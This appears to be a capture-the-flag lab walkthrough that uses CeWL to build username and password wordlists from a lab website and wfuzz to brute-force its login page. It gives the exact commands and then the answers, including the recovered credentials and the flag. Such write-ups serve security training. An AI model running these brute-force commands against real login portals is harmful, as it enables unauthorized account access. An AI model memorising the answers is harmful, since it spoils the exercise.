- What is CeWL?
- What are the capabilities of CeWL?
- How can we leverage CeWL to generate a custom wordlist from a website?
- How can we customise the tool's output for specific tasks?
Once the Machine is go to
you may install it by using the command
sudo apt-get install cewl -y
Create a password list using CeWL:
cewl -d 2 -m 5 -w passwords.txt http://MACHINE_IP --with-numbers
Create a username list using CeWL:
cewl -d 0 -m 5 -w usernames.txt http://MACHINE_IP/team.php --lowercase
Brute-force the login portal using wfuzz:
wfuzz -c -z file,usernames.txt -z file,passwords.txt --hs "Please enter the correct credentials" -u http://MACHINE_IP/login.php -d "username=FUZZ&password=FUZ2Z"
Questions:
- What is the correct username and password combination? Format username:password
ANSWER
isaias:Happiness
- What is the flag?
ANSWER
THM{m3rrY4nt4rct1crAft$}